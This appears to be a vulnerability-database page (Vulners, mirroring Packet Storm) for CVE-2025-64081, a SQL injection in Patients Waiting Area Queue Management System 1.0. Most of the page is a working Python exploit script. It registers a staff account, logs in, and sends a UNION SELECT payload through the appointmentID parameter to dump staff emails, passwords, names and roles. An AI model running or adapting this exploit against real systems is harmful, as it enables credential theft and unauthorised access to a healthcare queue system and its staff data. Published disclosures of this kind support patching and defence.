Vulners
Lucene search
π Patients Waiting Area Queue Management System 1.0 SQL Injection
ποΈΒ 13 Nov 2025Β 00:00:00Reported byΒ Deva ParekhTypeΒ 
Β packetstormπΒ packetstorm.newsπΒ 125Β Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2025-64081 | 8 Dec 202519:30 | β | circl |
 | SourceCodester Patients Waiting Area Queue Management System SQL注ε ₯ζΌζ΄ | 8 Dec 202500:00 | β | cnnvd |
 | CVE-2025-64081 | 8 Dec 202500:00 | β | cve |
 | CVE-2025-64081 | 8 Dec 202500:00 | β | cvelist |
 | EUVD-2025-201798 | 8 Dec 202518:30 | β | euvd |
 | CVE-2025-64081 | 8 Dec 202518:15 | β | nvd |
| π Patients Waiting Area Queue Management System 1.0 SQL Injection | 13 Feb 202600:00 | β | packetstorm |
 | PT-2025-49586 | 8 Dec 202500:00 | β | ptsecurity |
 | CVE-2025-64081 | 9 Dec 202500:11 | β | redhatcve |
 | CVE-2025-64081 | 8 Dec 202500:00 | β | vulnrichment |
10
# Exploit Title: Patients Waiting Area Queue Management System v1.0 - SQL Injection
# Exploit Author: Deva Parekh (pr0f)
# Date: October 23, 2025
# Vendor Homepage: https://www.sourcecodester.com/php/18348/patients-waiting-area-queue-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=18348&title=+Patients+Waiting+Area+Queue+Management+System
# Tested on: Kali Linux, Apache, Mysql
# Vendor: sourcecodester
# Version: v1.0
# Exploit Description:
# Patients Waiting Area Queue Management System v1.0 suffers from an SQL Injection that allows an attacker dump contents from the database.
import requests, json, sys
from typing import Sequence, Iterable
def _to_cell_str(value) -> str:
if value is None:
return ""
s = str(value)
return " ".join(s.splitlines())
def _format_cell(text: str, width: int, align: str) -> str:
if align == "right":
return text.rjust(width)
if align == "center":
return text.center(width)
return text.ljust(width)
def print_table(rows: Iterable[Sequence], headers: Sequence = None,
align: Sequence[str] = None, padding: int = 1):
rows = [list(map(_to_cell_str, r)) for r in rows]
ncols = max((len(r) for r in rows), default=0)
if headers:
headers = list(map(_to_cell_str, headers))
ncols = max(ncols, len(headers))
for r in rows:
if len(r) < ncols:
r.extend([""] * (ncols - len(r)))
if headers and len(headers) < ncols:
headers.extend([""] * (ncols - len(headers)))
if not align:
aligns = ["left"] * ncols
else:
aligns = list(align)
if len(aligns) < ncols:
aligns.extend([aligns[-1]] * (ncols - len(aligns)))
col_widths = [0] * ncols
for col in range(ncols):
if headers:
col_widths[col] = max(col_widths[col], len(headers[col]))
for r in rows:
col_widths[col] = max(col_widths[col], len(r[col]))
pad = " " * padding
def make_sep():
parts = ["+"]
for w in col_widths:
parts.append("-" * (w + padding * 2))
parts.append("+")
return "".join(parts)
sep = make_sep()
print(sep)
if headers:
parts = ["|"]
for i in range(ncols):
parts.append(pad + _format_cell(headers[i], col_widths[i], aligns[i]) + pad)
parts.append("|")
print("".join(parts))
print(sep)
for r in rows:
parts = ["|"]
for i in range(ncols):
parts.append(pad + _format_cell(r[i], col_widths[i], aligns[i]) + pad)
parts.append("|")
print("".join(parts))
print(sep)
def register_user(session, user):
headers = {'Content-Type' : 'application/json'}
session.post(f'http://{target}/php/api_register_staff.php', json=user, headers=headers)
def login(session, user):
headers = {'Content-Type' : 'application/x-www-form-urlencoded'}
payload = f'email={user['email']}&password={user['password']}'
session.post(f'http://{target}/php/api_register_staff.php', data=payload, headers=headers)
def exploit_sqli(session):
sql_payload = "5' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,id,email,NULL,password,NULL,NULL,NULL,NULL,NULL,first_name,last_name,role,NULL,is_active from staff-- "
rep = session.get(f'http://{target}/php/api_patient_schedule.php?appointmentID={sql_payload}', allow_redirects=False)
return json.loads(rep.content.decode("utf-8").rstrip())
def convert_to_row(dump):
rows = [(a['time'], a['doctor'], a['appointment_date'], a['reason'], a['fullname'], a['appointment']) for a in dump['appointment']]
return rows
def print_sig():
print('')
print('ββββββββββββΈ')
print('β£βββ£β³βββββ£βΈ ')
print('βΉ βΉββΈββββΉ ')
print('~ https://github.com/pr0f94')
print('~ Patients Waiting Area Queue Management System v1 - union sqli')
print('')
if __name__ == "__main__":
headers = ["id", "first_name last_name", "email", "password", "role", "is_active"]
user = {"firstName":"pr0f","lastName":"pr0f","email":"[email protected]","password":"getr3kt","role":"doctor"}
print_sig()
target = sys.argv[1]
s = requests.Session()
print('-- Registering new user')
register_user(s, user)
print('-- Logging in as user')
login(s, user)
print('-- Exploiting sqli to dump staff table')
table_dump = exploit_sqli(s)
rows = convert_to_row(table_dump)
print('')
print_table(rows, headers=headers)Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Nov 2025 00:00Current
8.2High risk
Vulners AI Score8.2
EPSS0.00052